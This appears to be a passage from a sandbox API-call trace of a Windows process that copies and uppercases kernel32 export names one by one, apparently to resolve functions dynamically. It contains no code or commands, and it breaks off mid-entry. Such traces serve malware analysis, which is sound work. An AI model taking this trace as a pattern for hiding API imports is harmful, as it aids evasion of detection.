lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.371] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.371] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.371] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.371] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.372] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.372] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.372] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.372] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.372] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.372] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.372] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.372] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.372] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.372] lstrlenA (lpString="BEEP") returned 4 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.372] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.372] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.372] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.372] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.372] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.372] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.372] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.372] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.372] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.372] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.373] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.373] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.373] lstrlenA (lpString="CANCELIO") returned 8 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.373] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.373] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.373] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.373] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.373] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.373] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.373] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.373] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.373] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.373] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.373] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.373] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.373] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.373] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.373] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.373] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.374] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.374] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.374] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.374] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.374] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.374] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.374] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.374] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.374] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.374] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.374] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.374] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.374] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.374] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.374] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.374] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.374] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.374] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.374] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.375] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.375] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.375] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.375] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.375] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.375] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.375] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.375] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.375] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.375] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.375] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.375] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.375] lstrlenA (lpString="COPYFILEA") returned 9 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.375] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.375] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.375] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.375] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.375] lstrlenA (lpString="COPYFILEW") returned 9 [0083.375] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.375] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.376] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.376] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.376] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.376] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.376] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.376] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.376] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.376] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.376] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.376] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.376] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.376] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.376] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.376] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.376] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.376] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.376] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.376] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.376] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.377] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.377] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.377] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.377] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.377] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.377] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.377] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.377] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.377] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.377] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.377] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.377] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.377] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.377] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.377] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.377] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.377] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.377] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.377] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.378] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.378] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.378] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.378] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.378] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.378] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.378] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.378] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.378] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.378] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.378] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.378] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.378] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.378] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.378] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.378] lstrcpyA (in: lpString1=0x3f2d468, 